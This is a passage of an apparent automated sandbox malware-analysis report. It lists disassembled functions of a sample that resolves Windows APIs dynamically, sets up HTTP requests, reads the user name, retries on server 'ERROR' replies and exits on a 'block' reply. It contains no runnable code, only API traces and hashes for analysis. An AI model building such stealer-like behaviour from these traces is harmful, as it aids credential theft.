                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                            • String ID: ERROR$ERROR$GET
                            • API String ID: 3749127164-2509457195
                            • Opcode ID: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                            • Instruction ID: 09556aedb75f6a886fd4a2da66488018361f6e102fd6a5948261133a35a7eca2
                            • Opcode Fuzzy Hash: ec90eb388166349e750661b16670738f55a2a616ee9d471b54b616c3e386faf6
                            • Instruction Fuzzy Hash: 5D714E71A00318ABDF15EBA0CC4AFEE77B8FB44704F104198F10A6B190DBB46A89DF91
                            Function 00397850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003811B7), ref: 00397880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0039789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                            • Instruction ID: 6e16944608dc63ea6d3a9f65c249c60cada6f8bcf7c3beec70a1a06307d3152a
                            • Opcode Fuzzy Hash: 4bade1e5e5f9f6933ca1c3133ced58e060376b16a59062a1d8d7b00e3592d636
                            • Instruction Fuzzy Hash: 27F04FB1944609AFDB00DF99DD4AFAEBFB8FB04715F10025AFA05A2680C77815048BA1
                            Function 00381160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                            • Instruction ID: ddcf895beb346e7908b5dd2dd2d339100d6328637f3f925fcba0c875c603a022
                            • Opcode Fuzzy Hash: 8546a621678b8cc3be2ca66fc32eca390fbcbbb81d85b752b3c34a285384ba46
                            • Instruction Fuzzy Hash: B2D05E7490030CDFCB00EFE0DC8DADDBBB8FB08315F000594D90562340EA305486CBA6
                            Function 00399C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 633 399c10-399c1a 634 399c20-39a031 GetProcAddress * 43 633->634 635 39a036-39a0ca LoadLibraryA * 8 633->635 634->635 636 39a0cc-39a141 GetProcAddress * 5 635->636 637 39a146-39a14d 635->637 636->637 638 39a153-39a211 GetProcAddress * 8 637->638 639 39a216-39a21d 637->639 638->639 640 39a298-39a29f 639->640 641 39a21f-39a293 GetProcAddress * 5 639->641 642 39a2a5-39a332 GetProcAddress * 6 640->642 643 39a337-39a33e 640->643 641->640 642->643 644 39a41f-39a426 643->644 645 39a344-39a41a GetProcAddress * 9 643->645 646 39a428-39a49d GetProcAddress * 5 644->646 647 39a4a2-39a4a9 644->647 645->644 646->647 648 39a4ab-39a4d7 GetProcAddress * 2 647->648 649 39a4dc-39a4e3 647->649 648->649 650 39a515-39a51c 649->650 651 39a4e5-39a510 GetProcAddress * 2 649->651 652 39a612-39a619 650->652 653 39a522-39a60d GetProcAddress * 10 650->653 651->650 654 39a61b-39a678 GetProcAddress * 4 652->654 655 39a67d-39a684 652->655 653->652 654->655 656 39a69e-39a6a5 655->656 657 39a686-39a699 GetProcAddress 655->657 658 39a708-39a709 656->658 659 39a6a7-39a703 GetProcAddress * 4 656->659 657->656 659->658
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,01145270), ref: 00399C2D
                            • GetProcAddress.KERNEL32(74DD0000,01145410), ref: 00399C45
                            • GetProcAddress.KERNEL32(74DD0000,01159310), ref: 00399C5E
                            • GetProcAddress.KERNEL32(74DD0000,011593A0), ref: 00399C76
                            • GetProcAddress.KERNEL32(74DD0000,01159430), ref: 00399C8E
                            • GetProcAddress.KERNEL32(74DD0000,011593D0), ref: 00399CA7
                            • GetProcAddress.KERNEL32(74DD0000,0114B9D0), ref: 00399CBF
                            • GetProcAddress.KERNEL32(74DD0000,0115D1E0), ref: 00399CD7
                            • GetProcAddress.KERNEL32(74DD0000,0115D150), ref: 00399CF0
                            • GetProcAddress.KERNEL32(74DD0000,0115D228), ref: 00399D08
                            • GetProcAddress.KERNEL32(74DD0000,0115D1F8), ref: 00399D20
                            • GetProcAddress.KERNEL32(74DD0000,011454D0), ref: 00399D39
                            • GetProcAddress.KERNEL32(74DD0000,011455B0), ref: 00399D51
                            • GetProcAddress.KERNEL32(74DD0000,01145290), ref: 00399D69
                            • GetProcAddress.KERNEL32(74DD0000,01145470), ref: 00399D82
                            • GetProcAddress.KERNEL32(74DD0000,0115D330), ref: 00399D9A
                            • GetProcAddress.KERNEL32(74DD0000,0115D210), ref: 00399DB2
                            • GetProcAddress.KERNEL32(74DD0000,0114B8B8), ref: 00399DCB
                            • GetProcAddress.KERNEL32(74DD0000,01145490), ref: 00399DE3
                            • GetProcAddress.KERNEL32(74DD0000,0115D108), ref: 00399DFB
                            • GetProcAddress.KERNEL32(74DD0000,0115D0F0), ref: 00399E14
                            • GetProcAddress.KERNEL32(74DD0000,0115D1C8), ref: 00399E2C
                            • GetProcAddress.KERNEL32(74DD0000,0115D270), ref: 00399E44
                            • GetProcAddress.KERNEL32(74DD0000,011455D0), ref: 00399E5D
                            • GetProcAddress.KERNEL32(74DD0000,0115D2B8), ref: 00399E75
                            • GetProcAddress.KERNEL32(74DD0000,0115D2D0), ref: 00399E8D
                            • GetProcAddress.KERNEL32(74DD0000,0115D168), ref: 00399EA6
                            • GetProcAddress.KERNEL32(74DD0000,0115D180), ref: 00399EBE
                            • GetProcAddress.KERNEL32(74DD0000,0115D390), ref: 00399ED6
                            • GetProcAddress.KERNEL32(74DD0000,0115D288), ref: 00399EEF
                            • GetProcAddress.KERNEL32(74DD0000,0115D0D8), ref: 00399F07
                            • GetProcAddress.KERNEL32(74DD0000,0115D240), ref: 00399F1F
                            • GetProcAddress.KERNEL32(74DD0000,0115D258), ref: 00399F38
                            • GetProcAddress.KERNEL32(74DD0000,0115A1F0), ref: 00399F50
                            • GetProcAddress.KERNEL32(74DD0000,0115D348), ref: 00399F68
                            • GetProcAddress.KERNEL32(74DD0000,0115D198), ref: 00399F81
                            • GetProcAddress.KERNEL32(74DD0000,011452B0), ref: 00399F99
                            • GetProcAddress.KERNEL32(74DD0000,0115D1B0), ref: 00399FB1
                            • GetProcAddress.KERNEL32(74DD0000,011454F0), ref: 00399FCA
                            • GetProcAddress.KERNEL32(74DD0000,0115D318), ref: 00399FE2
                            • GetProcAddress.KERNEL32(74DD0000,0115D120), ref: 00399FFA
                            • GetProcAddress.KERNEL32(74DD0000,011455F0), ref: 0039A013
                            • GetProcAddress.KERNEL32(74DD0000,01145610), ref: 0039A02B
                            • LoadLibraryA.KERNEL32(0115D2A0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A03D
                            • LoadLibraryA.KERNEL32(0115D138,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A04E
                            • LoadLibraryA.KERNEL32(0115D3A8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A060
                            • LoadLibraryA.KERNEL32(0115D2E8,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A072
                            • LoadLibraryA.KERNEL32(0115D300,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A083
                            • LoadLibraryA.KERNEL32(0115D360,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A095
                            • LoadLibraryA.KERNEL32(0115D378,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0A7
                            • LoadLibraryA.KERNEL32(0115D3C0,?,00395CA3,003A0AEB,?,?,?,?,?,?,?,?,?,?,003A0AEA,003A0AE3), ref: 0039A0B8
                            • GetProcAddress.KERNEL32(75290000,01145710), ref: 0039A0DA
                            • GetProcAddress.KERNEL32(75290000,0115D558), ref: 0039A0F2
                            • GetProcAddress.KERNEL32(75290000,01159060), ref: 0039A10A
                            • GetProcAddress.KERNEL32(75290000,0115D570), ref: 0039A123
                            • GetProcAddress.KERNEL32(75290000,01145850), ref: 0039A13B
                            • GetProcAddress.KERNEL32(73560000,0114B9F8), ref: 0039A160
                            • GetProcAddress.KERNEL32(73560000,01145750), ref: 0039A179
                            • GetProcAddress.KERNEL32(73560000,0114B7A0), ref: 0039A191
                            • GetProcAddress.KERNEL32(73560000,0115D468), ref: 0039A1A9
                            • GetProcAddress.KERNEL32(73560000,0115D4B0), ref: 0039A1C2
                            • GetProcAddress.KERNEL32(73560000,01145830), ref: 0039A1DA
                            • GetProcAddress.KERNEL32(73560000,011456F0), ref: 0039A1F2
                            • GetProcAddress.KERNEL32(73560000,0115D4F8), ref: 0039A20B
                            • GetProcAddress.KERNEL32(752C0000,01145930), ref: 0039A22C
                            • GetProcAddress.KERNEL32(752C0000,011456D0), ref: 0039A244
                            • GetProcAddress.KERNEL32(752C0000,0115D3F0), ref: 0039A25D
                            • GetProcAddress.KERNEL32(752C0000,0115D510), ref: 0039A275
                            • GetProcAddress.KERNEL32(752C0000,011458F0), ref: 0039A28D
                            • GetProcAddress.KERNEL32(74EC0000,0114B868), ref: 0039A2B3
                            • GetProcAddress.KERNEL32(74EC0000,0114BB60), ref: 0039A2CB
                            • GetProcAddress.KERNEL32(74EC0000,0115D3D8), ref: 0039A2E3
                            • GetProcAddress.KERNEL32(74EC0000,011458D0), ref: 0039A2FC
                            • GetProcAddress.KERNEL32(74EC0000,01145730), ref: 0039A314
                            • GetProcAddress.KERNEL32(74EC0000,0114BA70), ref: 0039A32C
                            • GetProcAddress.KERNEL32(75BD0000,0115D528), ref: 0039A352
                            • GetProcAddress.KERNEL32(75BD0000,01145770), ref: 0039A36A
                            • GetProcAddress.KERNEL32(75BD0000,01159070), ref: 0039A382
                            • GetProcAddress.KERNEL32(75BD0000,0115D540), ref: 0039A39B
                            • GetProcAddress.KERNEL32(75BD0000,0115D588), ref: 0039A3B3
                            • GetProcAddress.KERNEL32(75BD0000,011457B0), ref: 0039A3CB
                            • GetProcAddress.KERNEL32(75BD0000,01145630), ref: 0039A3E4
                            • GetProcAddress.KERNEL32(75BD0000,0115D450), ref: 0039A3FC
                            • GetProcAddress.KERNEL32(75BD0000,0115D480), ref: 0039A414
                            • GetProcAddress.KERNEL32(75A70000,01145910), ref: 0039A436
                            • GetProcAddress.KERNEL32(75A70000,0115D4C8), ref: 0039A44E
                            • GetProcAddress.KERNEL32(75A70000,0115D408), ref: 0039A466
                            • GetProcAddress.KERNEL32(75A70000,0115D420), ref: 0039A47F
                            • GetProcAddress.KERNEL32(75A70000,0115D438), ref: 0039A497
                            • GetProcAddress.KERNEL32(75450000,011456B0), ref: 0039A4B8
                            • GetProcAddress.KERNEL32(75450000,011457D0), ref: 0039A4D1
                            • GetProcAddress.KERNEL32(75DA0000,01145950), ref: 0039A4F2
                            • GetProcAddress.KERNEL32(75DA0000,0115D498), ref: 0039A50A
                            • GetProcAddress.KERNEL32(6F070000,01145790), ref: 0039A530
                            • GetProcAddress.KERNEL32(6F070000,011457F0), ref: 0039A548
                            • GetProcAddress.KERNEL32(6F070000,01145810), ref: 0039A560
                            • GetProcAddress.KERNEL32(6F070000,0115D4E0), ref: 0039A579
                            • GetProcAddress.KERNEL32(6F070000,01145870), ref: 0039A591
                            • GetProcAddress.KERNEL32(6F070000,01145650), ref: 0039A5A9
                            • GetProcAddress.KERNEL32(6F070000,01145970), ref: 0039A5C2
                            • GetProcAddress.KERNEL32(6F070000,01145890), ref: 0039A5DA
                            • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0039A5F1
                            • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0039A607
                            • GetProcAddress.KERNEL32(75AF0000,0115CF10), ref: 0039A629
                            • GetProcAddress.KERNEL32(75AF0000,011590A0), ref: 0039A641
                            • GetProcAddress.KERNEL32(75AF0000,0115CDD8), ref: 0039A659
                            • GetProcAddress.KERNEL32(75AF0000,0115D060), ref: 0039A672
                            • GetProcAddress.KERNEL32(75D90000,011458B0), ref: 0039A693
                            • GetProcAddress.KERNEL32(6F960000,0115CF40), ref: 0039A6B4
                            • GetProcAddress.KERNEL32(6F960000,01145670), ref: 0039A6CD
                            • GetProcAddress.KERNEL32(6F960000,0115D048), ref: 0039A6E5
                            • GetProcAddress.KERNEL32(6F960000,0115CFD0), ref: 0039A6FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: HttpQueryInfoA$InternetSetOptionA
                            • API String ID: 2238633743-1775429166
                            • Opcode ID: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                            • Instruction ID: 701fd599167cd8c19d1371658738c6bee902014338ffe8dcf5958d3c3943077f
                            • Opcode Fuzzy Hash: 0fbb0d7a8573fbd0b5be1b57571cb6898d4332bce4a805b3f11da1d68ecdc510
                            • Instruction Fuzzy Hash: D0628DB5500A48AFC748DFA8FD88D563FF9F7AC309304851AA609C3225D739985AFF52
                            Function 00395510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 858 395510-395577 call 395ad0 call 39a820 * 3 call 39a740 * 4 874 39557c-395583 858->874 875 395585-3955b6 call 39a820 call 39a7a0 call 381590 call 3951f0 874->875 876 3955d7-39564c call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 874->876 892 3955bb-3955d2 call 39a8a0 call 39a800 875->892 902 395693-3956a9 call 39aad0 StrCmpCA 876->902 906 39564e-39568e call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 876->906 892->902 907 3957dc-395844 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 902->907 908 3956af-3956b6 902->908 906->902 1038 395ac3-395ac6 907->1038 911 3957da-39585f call 39aad0 StrCmpCA 908->911 912 3956bc-3956c3 908->912 931 395991-3959f9 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 911->931 932 395865-39586c 911->932 916 39571e-395793 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 912->916 917 3956c5-395719 call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 912->917 916->911 1017 395795-3957d5 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 916->1017 917->911 931->1038 938 39598f-395a14 call 39aad0 StrCmpCA 932->938 939 395872-395879 932->939 967 395a28-395a91 call 39a8a0 call 39a820 * 2 call 381670 call 39a800 * 4 call 396560 call 381550 938->967 968 395a16-395a21 Sleep 938->968 946 39587b-3958ce call 39a820 call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 939->946 947 3958d3-395948 call 39a740 * 2 call 381590 call 3952c0 call 39a8a0 call 39a800 call 39aad0 StrCmpCA 939->947 946->938 947->938 1043 39594a-39598a call 39a7a0 call 381590 call 3951f0 call 39a8a0 call 39a800 947->1043 967->1038 968->874 1017->911 1043->938
                            APIs
                              • Part of subcall function 0039A820: lstrlen.KERNEL32(00384F05,?,?,00384F05,003A0DDE), ref: 0039A82B
                              • Part of subcall function 0039A820: lstrcpy.KERNEL32(003A0DDE,00000000), ref: 0039A885
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395644
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003956A1
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395857
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395228
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 003952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395318
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 0039532F
                              • Part of subcall function 003952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00395364
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 00395383
                              • Part of subcall function 003952C0: lstrlen.KERNEL32(00000000), ref: 003953AE
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0039578B
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00395940
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00395A0C
                            • Sleep.KERNEL32(0000EA60), ref: 00395A1B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen$Sleep
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 507064821-2791005934
                            • Opcode ID: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                            • Instruction ID: 2960518bf6c2880505fcc4c67a64aaca3d9fbfc4db0db7590fa2eb74dbc8b190
                            • Opcode Fuzzy Hash: 3fd0a8401a81ffe40299dd41d5a2dd4bd50e91e3b563ac4c6954d3d94f418a3e
                            • Instruction Fuzzy Hash: F4E13072910A089ADF16FBB0DC97EED777CAF54300F408668B4066A091EF346A4DDBD2
                            Function 003917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1069 3917a0-3917cd call 39aad0 StrCmpCA 1072 3917cf-3917d1 ExitProcess 1069->1072 1073 3917d7-3917f1 call 39aad0 1069->1073 1077 3917f4-3917f8 1073->1077 1078 3917fe-391811 1077->1078 1079 3919c2-3919cd call 39a800 1077->1079 1081 39199e-3919bd 1078->1081 1082 391817-39181a 1078->1082 1081->1077 1084 39185d-39186e StrCmpCA 1082->1084 1085 39187f-391890 StrCmpCA 1082->1085 1086 3918f1-391902 StrCmpCA 1082->1086 1087 391951-391962 StrCmpCA 1082->1087 1088 391970-391981 StrCmpCA 1082->1088 1089 391913-391924 StrCmpCA 1082->1089 1090 391932-391943 StrCmpCA 1082->1090 1091 391835-391844 call 39a820 1082->1091 1092 391849-391858 call 39a820 1082->1092 1093 3918ad-3918be StrCmpCA 1082->1093 1094 3918cf-3918e0 StrCmpCA 1082->1094 1095 39198f-391999 call 39a820 1082->1095 1096 391821-391830 call 39a820 1082->1096 1110 39187a 1084->1110 1111 391870-391873 1084->1111 1112 39189e-3918a1 1085->1112 1113 391892-39189c 1085->1113 1118 39190e 1086->1118 1119 391904-391907 1086->1119 1101 39196e 1087->1101 1102 391964-391967 1087->1102 1104 39198d 1088->1104 1105 391983-391986 1088->1105 1097 391930 1089->1097 1098 391926-391929 1089->1098 1099 39194f 1090->1099 1100 391945-391948 1090->1100 1091->1081 1092->1081 1114 3918ca 1093->1114 1115 3918c0-3918c3 1093->1115 1116 3918ec 1094->1116 1117 3918e2-3918e5 1094->1117 1095->1081 1096->1081 1097->1081 1098->1097 1099->1081 1100->1099 1101->1081 1102->1101 1104->1081 1105->1104 1110->1081 1111->1110 1123 3918a8 1112->1123 1113->1123 1114->1081 1115->1114 1116->1081 1117->1116 1118->1081 1119->1118 1123->1081
                            APIs
                            • StrCmpCA.SHLWAPI(00000000,block), ref: 003917C5
                            • ExitProcess.KERNEL32 ref: 003917D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
